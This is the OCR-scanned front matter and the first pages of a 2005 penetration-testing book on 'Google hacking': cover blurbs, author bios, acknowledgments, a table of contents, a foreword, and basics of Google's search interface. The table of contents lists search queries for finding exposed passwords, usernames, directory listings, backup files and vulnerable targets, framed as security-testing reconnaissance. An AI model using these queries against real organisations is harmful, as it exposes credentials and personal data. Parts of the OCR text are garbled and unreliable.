"Understanding the adversary mindset is an important element in designing and developing effective protective strategies." — Amit Yoran, Former Director of the National Cyber Security Division, Department of Homeland Security Google Hacking FOR PENETRATION TESTERS Explore the Dark Side of Googling • Morph Google from "Directory Assistance Please" into a Rig Mounted Pneumatic Rock Drill • See How Bad Guys Use Portscans, CGI Scans, and Web Server Fingerprinting to Stroll in the Back Door of Your Enterprise • Slam the Door on Malicious Google Hacks That Expose Your Organization's Information Caches, Firewalls, IDS Logs, and Password Databases Register for Free Membership to soLutionsasyngress. com Over the last few years, Syngress has published many best-selling and critically acclaimed books, including Tom Shinder's Configuring ISA Server 2000, Brian Caswell and Jay Beale's Snort 2.0 Intrusion Detection, and Angela Orebaugh and Gilbert Ramirez's Ethereal Packet Sniffing. One of the reasons for the success of these books has been our unique solutions@syngress.com program. Through this site, we've been able to provide readers a real time extension to the printed book. As a registered owner of this book, you will qualify for free access to our members-only solutions@syngress.com program. Once you have registered, you will enjoy several benefits, including: ■ Four downloadable e-booklets on topics related to the book. Each booklet is approximately 20-30 pages in Adobe PDF format. They have been selected by our editors from other best-selling Syngress books as providing topic coverage that is directly related to the coverage in this book. ■ A comprehensive FAQ page that consolidates all of the key points of this book into an easy to search web page, pro- viding you with the concise, easy to access data you need to perform your job. ■ A "From the Author" Forum that allows the authors of this book to post timely updates links to related sites, or addi- tional topic coverage that may have been requested by readers. Just visit us at www.syngress.com/solutions and follow the simple registration process. You will need to have this book with you when you register. Thank you for giving us the opportunity to serve your needs. And be sure to let us know if there is anything else we can do to make your job easier. SYNGRESS Syngress Publishing, Inc., the author(s), and any person or firm involved in the writing, editing, or production (collectively "Makers") of this book ("the Work") do not guarantee or warrant the results to be obtained from the Work. There is no guarantee of any kind, expressed or implied, regarding the Work or its contents. The Work is sold AS IS and WITHOUT WARRANTY. You may have other legal rights, which vary from state to state. In no event will Makers be liable to you for damages, including any loss of profits, lost savings, or other incidental or consequential damages arising out from the Work or its contents. Because some states do not allow the exclusion or limitation of liability for consequential or incidental damages, the above limitation may not apply to you. You should always use reasonable care, including backup and other appropriate precautions, when working with computers, networks, data, and files. Syngress Media®, Syngress®, "Career Advancement Through Skill Enhancement®," "Ask the Author UPDATE®," and "Hack Proofing®," are registered trademarks of Syngress Publishing, Inc. "Syngress: The Definition of a Serious Security Library"™, "Mission Critical™," and "The Only Way to Stop a Hacker is to Think Like One^"^" are trademarks of Syngress Publishing, Inc. Brands and product names mentioned in this book are trademarks or service marks of their respective companies. KEY SERIAL NUMBER 001 HJIRTCV764 002 P09873D5FG 003 829KM8NJH2 004 FGDD458876 005 CVPLQ6WQ23 006 VBP965T5T5 007 HJJJ863WD3E 008 2987GVTWMK 009 629MP5SDJT 010 IMWQ295T6T PUBLISHED BY Syngress Publishing, Inc. 800 Hingham Street Rockland, MA 02370 Google Hacking for Penetration Testers Copyright © 2005 by Syngress Publishing, Inc. All rights reserved. Printed in the United States of America. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the pubhsher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for pubhcation. Printed in the United States of America 1234567890 ISBN: 1-931836-36-1 Publisher: Andrew Williams Page Layout and Art: Patricia Lupien Acquisitions Editor: Jaime Quigley Copy Editor: Darlene Bordwell Technical Editor: Alrik "Murf" van Eijkelenborg Indexer: J. Edmund Rush Cover Designer: Michael Kavish Distributed by O'Reilly Media, Inc. in the United States and Canada. For information on rights and translations, contact Matt Pedersen, Director of Sales and Rights, at Syngress Publishing; email niatt@syngress.com or fax to 781-681-3585. ^^^cknowledgments Syngress would like to acknowledge the following people for their kindness and sup- port in making this book possible. Syngress books are now distributed in the United States and Canada by O'Reilly Media, Inc. The enthusiasm and work ethic at O'Reilly is incredible and we would Hke to thank everyone there for their time and efforts to bring Syngress books to market: Tim O'Reilly, Laura Baldwin, Mark Brokering, Mike Leonard, Donna Selenko, Bonnie Sheehan, Cindy Davis, Grant Kikkert, Opol Matsutaro, Steve Hazelwood, Mark Wilson, Rick Brown, Leslie Becker, JiU Lothrop,Tim Hinton, Kyle Hart, Sara Winge, C.J. RayhiU, Peter Pardo, Leslie CrandeU, Valerie Dow, Regina Aggio, Pascal Honscher, Preston PauU, Susan Thompson, Bruce Stewart, Laura Schmier, Sue Willing, Mark Jacobsen, Betsy Waliszewski, Dawn Mann, Kathryn Barrett, John Chodacki, and Rob BuUington. And a hearty welcome to Aileen Berg — glad to be working with you. The incredibly hard working team at Elsevier Science, including Jonathan Bunkell, Ian Seager, Duncan Enright, David Burton, Rosanna Ramacciotti, Robert Fairbrother, Miguel Sanchez, Klaus Beran, Emma Wyatt, Rosie Moss, Chris Hossack, Mark Hunt, and Krista Leppiko, for making certain that our vision remains worldwide in scope. David Buckland, Marie Chieng, Lucy Chong, LesHe Lim, Audrey Gan, Pang Ai Hua, and Joseph Chan of STP Distributors for the enthusiasm with which they receive our books. Kwon Sung June at Acorn Publishing for his support. David Scott, Tricia Wilden, Marilla Burgess, Annette Scott, Andrew Swaffer, Stephen O'Donoghue, Bee Lowe, and Mark Langley of Woodslane for distributing our books throughout Australia, New Zealand, Papua New Guinea, Fiji Tonga, Solomon Islands, and the Cook Islands. Winston Lim of Global PubHshing for his help and support with distribution of Syngress books in the PhiHppines. A special thanks to Tim MacLeUan and Darci MiUer for their eternal patience and expertise. V Author Johnny Long has spoken on network security and Google hacking at several computer security conferences around the world including SANS, Defcon, and the Black Hat Briefings. During his recent career with Computer Sciences Corporation (CSC), a leading global IT services company, he has performed active network and physical security assessments for hundreds of government and commercial clients. His website, currently the Internet's largest repository of Google hacking techniques, can be found at http :/ /johnny. ihack- stuff.com. Technical Editor Alrik "Murf " van Eijkelenborg is a systems engineer for MBH Automatisering. MBH provides web applications, hardware, hosting, network, firewall, and VPN solutions. His specialties include tech- nical support and consulting on Linux, Novell and Windows net- works. His background includes positions as a network administrator for Multihouse, NTNT, K+V Van Alphen, Oranjewoud and Intersafe Holding. Alrik holds a bachelor's degree from the Business School of Economics (HES) in Rotterdam, The Netherlands. He is one of the main moderators for the Google Hacking Forums and a key contributor to the Google Hacking Database (GHDB). vii ^ Contributing Authors Steven "The Psyko" Whitacre [MCSE] is a senior network engi- neer with OPT, Inc, a leading provider of networking solutions in the San Francisco Bay Area, providing senior level network adminis- tration and security consulting to companies throughout the greater Bay Area. His specialties include: network design, implementation, administration, data recovery, network reconstruction, system foren- sics, and penetration testing. Stevens consulting background includes work for large universities, financial institutions, local law enforce- ment, and US and foreign government agencies. Steven is a former member of COTSE/Packetderm, and currently volunteers his time as a moderator for one of the largest security related forums on the Internet. Steven resides in San Francisco, CA with his wife and two daughters, and credits his success to their unwavering support. James C. Foster, Fellow, is the Deputy Director of Global Securit)^ Solution Development for Computer Sciences Corporation where he is responsible for the vision and development of physical, per- sonnel, and data security solutions. Prior to CSC, Foster was the Director of Research and Development for Foundstone Inc. (acquired by McAfee) and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was an Executive Advisor and Research Scientist with Guardent Inc. (acquired by Verisign) and an adjunct author at Information Security Magazine (acquired by TechTarget), subse- quent to working as Security Research Specialist for the Department of Defense. With his core competencies residing in high-tech remote management, international expansion, application security, protocol analysis, and search algorithm technology, Foster has conducted numerous code reviews for commercial OS compo- nents, Win32 application assessments, and reviews on commercial- grade cryptography implementations. viii Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, Black Hat USA, Black Hat Windows, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been sited in USAToday, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds an A.S., B.S., MBA and numerous technology and management certifications and has attended or conducted research at the Yale School of Business, Harvard University, the University of Maryland, and is cur- rently a Fellow at University of Pennsylvania's Wharton School of Business. Foster is also a well published author with multiple com- mercial and educational papers; and has authored, contributed, or edited for major publications including Snort 2. 1 Intrusion Detection (Syngress Publishing, ISBN: 1-931836-04-3); Hacking Exposed, Fourth Edition, Anti-Hacker Toolkit, Second Edition; Advanced Intrusion Detection; Hacking the Code: ASP.NET Web Application Security (Syngress, ISBN: 1-932266-65-S) ; Anti-Spam Toolkit; and Google Hacking for Penetration Testers (Syngress, ISBN: 1-931836-36-1). Matt Fisher is a Senior Security Engineer for SPI Dynamics, which specializes in automated web application security assessments products for the entire software development lifecycle. As an engi- neer at SPI Dynamics, he has performed hundreds of web applica- tion assessments and consulted to the Fortune 500, Federal Government, and Department of Defense. He has educated thou- sands on web application security through presentations at numerous conferences and workshops both domestically and abroad. Prior to working for SPI Dynamics, he managed large-scale com- plex Fortune 500 websites at Digex. He has held technical certifica- tions from Novell, Checkpoint, Microsoft, ISC2, and SPI Dynamics. ix Matt lives in Columbia, MD, and was only able to write his contri- bution for this book only through the grace and enduring patience of his fauTily Lisa, Jacob, and Olivia. He'd like to take this last line to give a shout to his coworkers and friends at SPI Dynamics and SPI Labs whom that make it the best place in the world to work, Nummish for the constant help with his futile coding efforts, and of course his Mum who is eternally proud of him. "Hi Mom!" Pete Herzog (OPST, OPSA, HHST), is co-creator of ISECOM and is directly involved in all ISECOM projects as Managing Director. He has arrived from a long career in the security line of business. His main objective is for ISECOM is to improve interna- tional security and ethics (www.isecom.org/projects/rules.shtml) from the night watchman to the high-tech system designers to the high school student (http://www.hackerhighschool.org). This has led beyond methodologies to the successful Hacker Highschool pro- gram, a free security awareness program for high schools. In addition to managing ISECOM, Pete teaches the masters for security at La Salle University in Barcelona which accredits the OPST and OPSA training courses as well as Business Information Security in the ESADE MBA program, which is the foundation of the OPSA. Additionally Pete provides both paid and pro-bono consultancy on the business of security and security testing to companies of all sizes in an effort to raise the bar on security practice as well as to stay current in the security industry. I'm Johnny. I hack stuff Have you ever had a hobby that changed your Hfe? I have a tendency to get hyper-focused on my hobbies, but this "Google Hacking thing", although it's labeled me "That Google Guy" has been a real blessing for me. I've been pub- lished in the papers, written about, and linked more times than I can count. I'm now invited to speak at the conferences I once attended in awe. I've been to Japan and back, and now, much to my disbelief, written a large portion of the book you hold now. I've met many, many amazing people and I've made some close friends despite the fact that I've never actually "met" most of them. I've been given amazing opportunities, and there's no apparent end in sight. I owe many people a huge debt of thanks, but it's "printing day" for this book, and I'm left with a few short minutes to express my gratitude. It's simply not enough, and to all those I've forgotten, I'm sorry. You know you helped, so thanks. = / First and foremost, thanks to God for the many blessings in my life. Christ for the Living example, and the Spirit of God that encourages me to live each day with real purpose. Thanks to my wife and three wonderful children. Words can't express how much you mean to me. Thanks for putting up with the "real" jOhnny. Thanks to Mom and Dad for letting me stay up all hours as I fed my digital addiction. Thanks to the book team, Alrik "Murf" van Eijkelenborg, James Foster, Steve, Matt, Pete and Roelof Mr. Cooper, Mrs. Elliott, Athy C, Vince Ritts, Jim Chappie, Topher H, Mike Schiffman, DonTinique Brezinski and rain.forest. puppy all stopped what they were doing to help shape my future. I couldn't make it without the help of close friends to help me through life: Nathan B, Sujay S, Stephen S. Thanks to Mark Norman for keeping it real. The Google Masters fi^om the Google Hacking forums made many contribu- tions to the forums and the GHDB, and I'm honored to list them here in descending post total order: murfie, jimmyneutron, klouw, lOom, ThePsyko, MILKMAN, cybercide, stonersavant, Deadlink, crash_nionkey, zoro25, Renegade334, wasabi, urban, mlynch, digital.revolution, Peefy, brasileiro, John, Z!nCh, ConiSec, yeseins, sfd, sylex, wolveso, xlockex, injection33. Murk. A spe- cial thanks to Murf for keeping the site afloat while I wrote this book, and also to mod team: ThePsyko, lOom, wasabi, and jimmyneutron. The StrikeForce was always hard to describe, but it encompassed a large part of my life, and I'm very thankful that I was able to play even a small part: Jason A, Brian A, Jim C, Roger C, Carter, Carey, Czup, Ross D, Fritz, Jeff G, Kevin H, Micha H,Troy H, Patrick J, KristyDave Klug, Logan L,Laura,Don M, Chris Mclelland, Murray, Deb N, Paige, Roberta, Ron S, Matty T, Chuck T, Katie W, Tim W, Mike W. Thanks to CSC and the many awesome bosses I've had. You rule: "FunkSoul", Chris S, Matt B, Jason E, and Al E. Thanks to the 'TIP crew for making life fiin and interesting five days out of seven. You're too many to list, but some I remember I've worked with more than others: Anthony, Brian, Chris, Christy, Don, Heidi, Joe, Kevan,The 'Mikes', "O", Preston, Richard, Rob, Ron H, Ron D, Steve, Torpedo, Thane. It took a lot of music to drown out the noise so I could churn out this book. Thanks to P.O.D. (thanks Sonny for the words). Pillar, Project 86, Avalon 02 remix, D.J. Lex,Yoshinori Sunahara, Hashim and SubSeven (great name!). Shouts to securitytribe, Joe Grand, Russ Rogers, RoelofTemmingh, Seth Fogie, Chris Hurley, Bruce Potter, Jeff, Ping, EH, Grifter at Blackhat, and the whole Syngress family of authors. I'm honored to be a part of the group, although you all keep me humble! Thanks to Andrew and Jaime. You guys rule! Thanks to Apple Computer, Inc for making an awesome laptop (and OS) . Despite being bounced down my driveway due to a heartbreaking bag failure a month after I bought it, my 12" G4 PowerBook wasn't affected in the slightest. That same laptop was used to layout, author and proof more than 10 chapters of this book, maintain and create my website, and present to the masses at all the conferences. No ordinary laptop could have done all that. I only wish it wasn't so ugly and dented, (http://johnny.ihackstuff.com/images/dent.jpg) — -Johnny Long November 22, 2004 xii Contents Foreword xxiii Chapter 1 Google Searching Basics 1 Introduction 2 Exploring Google's Web-Based Interface 2 Google's Web Search Page Google Web Results Page 5 Google Groups . . . Google Image Search Google Preferences t^jM^I: ' Language Tools . ^^^^R-l^Hlfe^ . .12 Building GoogkC The Goflbpjj^^F^HB^oogle Searchi: Basic Seeching 7^^^""!^. 17 Using Boolean Operate^ and Special Characirers 18 Search F Working W^^^^g,.. . URL S)|P§ •: . -fP. '. 25 Special Characters 26 Putting the Pieces Together 27 Summary -i^HHll^; 37 Solutions f 37 Links to Sit^^^^K 38 Frequently ./^^^^Kiestions 39 Chapter 2 Adfli^BPperators 41 Introduction 42 Operator Syntax 43 TroublesJaoDtingYour Syntax 44 uction 21 oogle URLs 24 XIII xiv Contents Introducing Google's Advanced Operators 46 Intitle and Allintitle: Search Within the Title of a Page . .46 AUintext: Locate a String Within the Text of a Page . . .49 Inurl and AUinurl: Finding Text in a URL 50 Site: Narrow Search to Specific Sites 52 Filetype: Search for Files of a Specific Type 54 Link: Search for Links to a Page 59 Inanchor: Locate Text Within Link Text 62 Cache: Show the Cached Version of a Page 62 Numrange: Search for a Number 63 Daterange: Search for Pages Published Within a Certain Date Range 64 Info: Show Google's Summary Information 65 Related: Show Related Sites 66 Author: Search Groups for an Author of a Newsgroup Post 66 Group: Search Group Titles 69 Insubject: Search Google Groups Subject Lines 69 Msgid: Locate a Group Post by Message ID 70 Stocks: Search for Stock Information 71 Define: Show the Definition of a term 72 Phonebook: Search Phone Listings 72 Colliding Operators and Bad Search-Fu 75 Summary 80 Solutions Fast Track 80 Links to Sites 85 Frequently Asked Questions 85 Chapter 3 Google Hacking Basics 87 Introduction 88 Anonymity with Caches 88 Using Google as a Proxy Server 95 Directory Listings 99 Locating Directory Listings 100 Finding Specific Directories 101 Finding Specific Files 102 Server Versioning 1 03 Contents xv Going Out on a Limb: Traversal Techniques 108 Directory Traversal 109 Incremental Substitution 110 Extension Walking Ill Summary 115 Solutions Fast Track 115 Links to Sites 118 Frequently Asked Questions 118 Chapter 4 Preassessment 121 Introduction 1 22 The Birds and the Bees 122 Intranets and Human Resources 123 Help Desks 124 Self-Help and "How- To" Guides 124 Job Listings 126 Long Walks on the Beach 126 Names, Names, Names 127 Automated E-Mail Trolling 128 Addresses, Addresses, and More Addresses! 134 Nonobvious E-Mail Relationships 139 Personal Web Pages and Blogs 1 40 Instant Messaging 140 Web-Based Mailing Lists 141 Resumes and Other Personal Information 142 Romantic Candlelit Dinners 143 Badges? We Don't Need No Steenkin' Badges! 143 What's Nearby? 143 Coffee Shops 144 Diners and Delis 144 Gas Stations 145 Bars and Nightclubs 145 Preassessment Checklist 146 Summary 147 Solutions Fast Track 147 Links to Sites 148 Frequently Asked Questions 148 xvi Contents Chapters Network Mapping 151 Introduction 152 Mapping Methodology 152 Mapping Techniques 154 Domain Determination 154 Site Crawling 155 Page Scraping Domain Names 156 API Approach 158 Link Mapping 159 Group Tracing 164 Non-Google Web Utilities 166 Targeting Web-Enabled Network Devices 171 Locating Various Network Reports 173 Summary 176 Solutions Fast Track 176 Links to Sites 177 Frequently Asked Questions 178 Chapter 6 Locating Exploits and Finding Targets . . .181 Introduction 182 Locating Exploit Code 182 Locating Public Exploit Sites 182 Locating Exploits Via Common Code Strings 184 Locating Vulnerable Targets 1 86 Locating Targets Via Demonstration Pages 187 Locating Targets Via Source Code 189 Locating Targets Via CGI Scanning 197 Summary 200 Solutions Fast Track 200 Links to Sites 201 Frequently Asked Questions 201 Chapter 7 Ten Simple Security Searches That Work . .203 Introduction 204 site 204 intitle:index.of 206 error | warning 206 Contents xvii login I logon 208 username | userid | employee. ID | "your username is" 209 password | passcode | "your password is" 210 admin | administrator 210 — ext:html — ext:htm — extishtinl — ext:asp — ext:php . . . .212 inurl:temp | inurhtmp | inurl:backup | inurhbak . . . .216 intranet | help.desk 216 Summary 218 Solutions Fast Track 218 Frequently Asked Questions 220 Chapter 8 Tracking Down Web Servers, Login Portals, and Networl< Hardware 221 Introduction 222 Locating and Profiling Web Servers 223 Directory Listings 223 Web Server Software Error Messages 225 Microsoft Internet Information Server (IIS) 225 Apache Web Server 229 Application Software Error Messages 238 Default Pages 241 Default Documentation 246 Sample Programs 248 Locating Login Portals 250 Locating Network Hardware 255 Summary 259 Solutions Fast Track 259 Frequently Asked Questions 261 Chapter 9 Usernames, Passwords, and Secret Stuff, Oh My! 263 Introduction 264 Searching for Usernames 264 Searching for Passwords 270 Searching for Credit Card Numbers, Social Security Numbers, and More 276 Social Security Numbers 279 Personal Financial Data 279 xviii Contents Searching for Other Juicy Info 280 Summary 285 Solutions Fast Track 285 Frequently Asked Questions 287 Chapter 10 Document Grinding and Database Digging 289 Introduction 290 Configuration Files 291 Log Files 297 Office Documents 299 Database Digging 301 Login Portals 302 Support Files 304 Error Messages 306 Database Dumps 309 Actual Database Files 310 Automated Grinding 312 Google Desktop Search 316 Summary 317 Solutions Fast Track 317 Links to Sites 318 Frequently Asked Questions 319 Chapter 1 1 Protecting Yourself from Google Hackers 321 Introduction 322 A Good, Solid Security Policy 322 Web Server Safeguards 323 Directory Listings and Missing Index Files 324 Blocking Crawlers with Robots.txt 325 NOARCHIVE: The Cache "Killer" 327 NOSNIPPET: Getting Rid of Snippets 327 Password-Protection Mechanisms 328 Software Default Settings and Programs 330 Hacking Your Own Site 331 Site Yourself 332 Gooscan 332 Installing Gooscan 333 Contents xix Gooscan's Options 334 Gooscan's Data Files 335 Using Gooscan 338 Windows Tools and the .NET Framework 342 Athena 343 Using Athena's Config Files 345 Constructing Athena Config Files 346 The Google API and License Keys 348 SiteDigger 348 Wikto 351 Getting Help from Google 354 Summary 358 Solutions Fast Track 358 Links to Sites 359 Frequently Asked Questions 360 Chapter 12 Automating Google Searches 363 Introduction 364 Understanding Google Search Criteria 365 Analyzing the Business Requirements for Black Hat Auto-Googling 368 Google Terms and Conditions 368 Understanding the Google API 369 Understanding a Google Search Request 371 Auto-Googling the Google Way 375 Google API Search Requests 375 Reading Google API Results Responses 376 Sample API Code 377 Source Documentation 381 Understanding Google Attack Libraries 384 Pseudocoding 385 Perl Implementation 386 Source Documentation 389 Python Implementation 390 Source 391 Output 392 Source Documentation 392 XX Contents C# Implementation (.NET) 393 Source Documentation 396 C Implementation 397 Source Documentation 405 Scanning the Web with Google Attack Libraries 406 CGI Vulnerability Scanning 406 Output 411 Summary 412 Solutions Fast Track 412 Links to Sites 413 Frequently Asked Questions 414 Appendix A Professional Security Testing 417 Introduction 418 Professional Security Testing 419 The Open Methodology 420 The Standardized Methodology 423 Connecting the Dots 429 Summary 434 Links to Sites 434 MaiHng Lists 434 Frequently Asked Questions 435 Appendix B An Introduction to Web Application Security 437 Introduction 438 Defining Web Application Security 438 The Uniqueness of Web Application Security 439 Web Application Vulnerabilities 440 Constraints of Search-Engine Hacking 443 Information and Vulnerabilities in Content 445 The Fast Road to Directory Enumerations 445 Robots.txt 445 FTP Log Files 446 Web Traffic Reports 447 HTML Comments 447 Error Messages 448 Sample Files 449 Contents xxi Bad Extensions 449 System Documentation 452 Hidden Form Fields, JavaScript, and Other Client-Side Issues 453 Playing with Packets 453 Viewing and Manipulating Packets 456 Code Vulnerabilities in Web Applications 459 CUent-Side Attacks 459 Escaping fi^om Literal Expressions 463 Session Hijacking 468 Command Execution: SQL Injection 471 Enumerating Databases 475 Summary 478 References 478 Solutions Fast Track 479 Frequently Asked Questions 482 Appendix C Google Hacking Database A number of extended tables and additional penetration testing tools are accessible from the Syngress Solutions Site (www. syngress . com/solutions) . Index 485 Foreword off her advice, the Oracle even gijUji Have you ever seen the movie, The Matrix? If you haven't, I strongly recom- mend that you rent this timeless sci-fi classic. Those who have seen The Matrix will recall that Keanu Reeves's character, a hacker named Neo, awakes to find himself in a vicious battle between humans and computer programs with only a rag-tag crew of misfits to help him win the fight. Neo learns the skills he needs for battle fi-om Morpheus, a Zen-like master played by Laurence Fishburne. As the movie unfolds, Neo is wracked with questions about his identity and destiny. In a crucial scene, Morpheus takes Neo to someone who can answer all of his questions: the Oracle, a kindly but mvs- terious grandmother who leads Meo down the right path by telling hi what he needs to know. And to cookie to help him feel better. So what does The Matrix have to do with this book? Well, my friends, in our matrix (that is, the universe that you anc^^mhabit), th^^racle is none other than Google itself. Think about it.W^jpHjjjjPl^ou lraw^|Bestion, whether big or small, you go to the Oracle (Google) and ask away. "What's a good recipe for delicious pesto?" "Are my dog's dentures a legitimate tax write*^ off?" "Where can I read a summary of the post-modern philosophical work Simulacra and Simulation!" The Oracle answers them all. And if you configure some search preferences, the OrScle — i.e., Google — ^wi# even give your Web browser a cookie. *■ But, of course, you'll get far more information from the Oracle if you ask the proper questions. And here's the best part: in this book, Johnny Long plays Morpheus, and you get to be Neo. Just as Fishburne 's character tutored and inspired Neo, so too will Johnny show you how to maximize the value of your interactions with Google. With the skills Johnny covfi!^ in this book, your Google kung fu will improve dramatic||j^|^g you a far better penetration tester and security practitioner. xxiv Foreword In fact, even outside the realm of information security, I personally believe that solid Google skiUs are some of the most important professional capabilities you can have over the next five to 10 years. Are you a professional penetration tester? Puzzled parent? Political partisan? Pious proselyte? Whatever your walk is in life, if you go to Google and ask the right questions using the techniques from this book, you will be more thoroughly armed with the information that you need to live successfully What's more, Johnny has written this book so that you can learn to ask Google for the reaUy juicy stuff-secrets about the security vulnerabilities of Web sites. Using the time-tested advice on these pages, you'U be able to find and Gx potentially massive problems before the bad guys show up and give you a very bad day. I've been doing penetration testing for a decade, and have con- sistently been astounded by the usefulness ofWeb site searches in our craft. When Johnny originally started his Web site, inventorying several ultra-pow- erful search strategies a few years back, I became hooked on his stuff. In this book, he's now gathered his best tricks, added a plethora of new ideas, and wrapped this information in a comprehensive methodology for penetration testing and ethical hacking. If you think, "Oh, that Google search stuff isn't very useful in a real- world penetration test. . . that's just playing around," then you have no idea what you are talking about. Whenever we conduct a detailed penetration test, we try to schedule at least one or two days for a very thorough investigation to get a feel for our target before firing a single packet from a scanner. If we can get even more time from the cUent, we perform a much deeper investigation, starting with a thorough interrogation of our favorite recon tool, Google. With a good investigation, using the techniques Johnny so masterfully shares in this book, our penetration-testing regimen really gets ofi^ on the right foot. I especially like Johnny's clear-cut, no-bones-about-it style in explaining exactly what each search means and how you can maximize the value of your results. The summary and FAQs at the end of each chapter help novices and experts examine a treasure trove of information. With such intrinsic value, I'U be keeping this book on the shelf near my desk during my next penetration test, right next to my weU-used Matrix DVD. — Ed Skoudis Intelguardians Cofounder and SANS Instructor www.syngress.com Chapter 1 ^ Google Searching Basics III i B Summary EI Solutions Fast^rack 0 Frequently Asked Questions 2 Chapter 1 • Google Searching Basics Introduction Google's Web interface is unmistakable. Its "look and feel" is copyright-protected, and for good reason. It is clean and simple. What most people fail to realize is that the interface is also extremely powerful. Throughout this book, we will see how you can use Google to uncover truly amazing things. However, as in most things in life, before you can run, you must learn to walk. This chapter takes a look at the basics of Google searching. We begin by exploring the powerful Web-based interface that has made Google a household word. Even the most advanced Google users still rely on the Web-based interface for the majority of their day-to-day queries. Once we understand how to navi- gate and interpret the results from the various interfaces, we will explore basic search techniques. Understanding basic search techniques will help us build a firm foundation on which to base more advanced queries. You will learn how to properly use the Boolean operators {AND, NOT, and OR) as well as exploring the power and flexibiUty of grouping searches. We will also learn Google's unique implementa- tion of several different wildcard characters. Finally, you will learn the syntax of Google's URL structure. Learning the ins and outs of the Google URL will give you access to greater speed and flexibility when submitting a series of related Google searches. We will see that the Google URL structure provides an excellent "shorthand" for exchanging interesting searches with friends and colleagues. Exploring Google's Web-Based Interface Soon we will begin using advanced queries aimed at pages containing very spe- cific content. Locating these pages requires skill in search reduction. The fol- lowing sections cover this in detail. Google's Web Search Page The main Google Web page, shown in Figure 1.1, can be found at www.google.com.The interface is known for its clean lines, pleasingly unclut- tered feel, and friendly interface. Although the interface might seem relatively featureless at first glance, we will see that many different search functions can be performed right from this first page. www. syngress.com Google Searching Basics • Chapter 1 Figure 1.1 The Main Google Web Page 0 o o 1 •< ► I I C I 0littp://www.google,com/ Coogle Google Web Images Groups r4ews Frooqle more » " Or CDC-gle ( ^Google S-earclh " ^j ' I'm Feeling Ljcky^ Advertising ProgramB - Business Solutions - Al^out Google SH2004 Googte - B-earthing 4,265,199,774 web pages Advainced S-eafch Lanq-uaqc Toola As shown in Figure 1.1, there is only one place on the page in which the user can type. This is the search field. In order to ask Google a question or query, you simply type what you're looking for and either press Enter (if your browser supports it) or click the Google Search button to be taken to the results page for your query. The links above the search field {Web, Images, Groups, and so on) open the other search areas shown in Table 1.1. The basic search functionality of each sec- tion is the same. Each search area of the Google Web interface has different capa- bilities and accepts different search operators, as we wiU see in the next chapter. For example, the inauthor operator was designed to be used in the groups search area. Table 1.1 outlines the functionality of each distinct area of the main Google Web page. Table 1.1 The Links and Functions of Google's Main Page Interface Section Description The Google toolbar The browser I am using has a Google "toolbar" installed and presented next to the address bar. Continued WWW. syngress.com Chapter 1 • Google Searching Basics Table 1.1 The Links and Functions of Google's Main Page Interface Section Description Web, Images, Groups, Directory; News; Froogle; and more >> tabs Search term input field Submit Search button I'm Feeling Lucky button Advanced Search Preferences Language tools These tabs allow you to search Web pages, pho- tographs, message group postings, Google directory listings, news stories, and retail print advertisements, respectively. If you are a first- time Google user, understand that these tabs are not always a replacement for the Submit Search button. Located directly below the alternate search tabs, this text field allows you to enter a Google search term. We will discuss the syntax of Google searching throughout this book. This button submits your search term. In many browsers, simply pressing the Enter/Return key after typing a search term will activate this button. Instead of presenting a list of search results, this button will forward you to the highest-ranked page for the entered search term. Often this page is the most relevant page for the entered search term. This link takes you to the Advanced Search page as shown. Much of the advanced search func- tionality is accessible from this page. Some advanced features are not listed on this page. We will look at these advanced options in the next chapter. This link allows you to select several options (which are stored in cookies on your machine for later retrieval). Available options include lan- guage selection, parental filters, number of results per page, and window options. This link allows you to set many different lan- guage options and translate text to and from various languages. www. syngress.com Google Searching Basics • Chapter 1 5 Google Web Results Page After processing a search query, Google displays a results page. The results page, shown in Figure 1.2, lists the results of your search and provides links to the Web pages that contain your search text. Figure 1.2 A Typical Web Search Results Page ^3 O O Coogle Search: google hacker I ^ ] I C ] [Gllittp://www.qDQqle.cQm/search?hl=en&ie=UTF-e&q=ciQQCile+lia( " '^Qr Cooqig Gougle Web Images Groups News Froogie more * google hacktr (_ Se Web Results 1 - 10 of about 634,000 for gpoQle hacker , (0.34 seconds) Google ... 4DV4NC30 534RCI-I PR3F3R3N(3Z EiNetJ'tBS 7tiO|5_ 4|| AmuJ Google - Google com in English. ©20tR Google - 53+r(H1N9 't,2a5,1 99.774 W38 |o4S35. vww.google.com/intl/xx-hacker/ - 3k - Cached - Simiiar paoes [PPR The Google Hacker's Guide ^ PDBAdolie Acrobat - View as HTML The Google Hacker's Guide johnny@ihacl^stLjff.cDni http://johnn/. ihackstuff.com - Page 1 - The Google Hacker's Guide Understanding and Defending Against the ... johnnyjhackstuff.comysecurityy premium/The Google Hackers Guide v 1.0. pdf-Sjrnjlarjjages iohnnv.ihacksluff com :: I'm iOhnnv. I hack stuff, ... goolink.pi added The Google Hacker's Guide added 03/ia^04. top downloads, The Google Hacker^s Guide 03.19.04 (6902 hits} [. johnny. ihackstuff.com/ - 71k - Jui 16. 2004 - Cached - Similar paoes [ More results from iohnnv.ihackstuff.com | The top part of the search result page mimics the main Web search page. Notice the Images, Groups, News, and Froogle links at the top of the page. By clicking these links, you automatically resubmit your search as an Image, Group, News, or Froogle search, without having to retype your query. The results line shows which results are displayed (1—10, in this case), the approximate total number of matches (here, about 634,000), the search query itself (including links to dictionary lookups of individual words), and the amount of time the query took to execute. The speed of the query is often overlooked, but it is quite impressive. Even large queries resulting in millions of hits are returned within a fraction of a second! For each entry on the results page, Google lists the name of the site, a sum- mary of the site (usually the first few lines of content), the URL of the page that matched, the size and date the page was last crawled, a cached link that shows the page as it appeared when Google last crawled it, and a link to pages with similar content. If the result page is written in a language other than your native lan- guage and Google supports the translation from that language into yours (set in www. syngress.com 6 Chapter 1 • Google Searching Basics the preferences screen), a link titled Translate this page wiU appear, allowing you to read an approximation of that page in your own language (see Figure 1.3). Figure 1.3 Google Translation Le mus^e Virtuel dU COChon - [ Translate this page ] ... Mille merci et bonne visitettttt Venez participerau concours du CQchon du mois et courez la chance d'avoir votre nom Inscht a perpetuite dans ce site. ... membres.lycos.fr/museecochon/ - 16lt - Cached - Similar pages Underground Googling 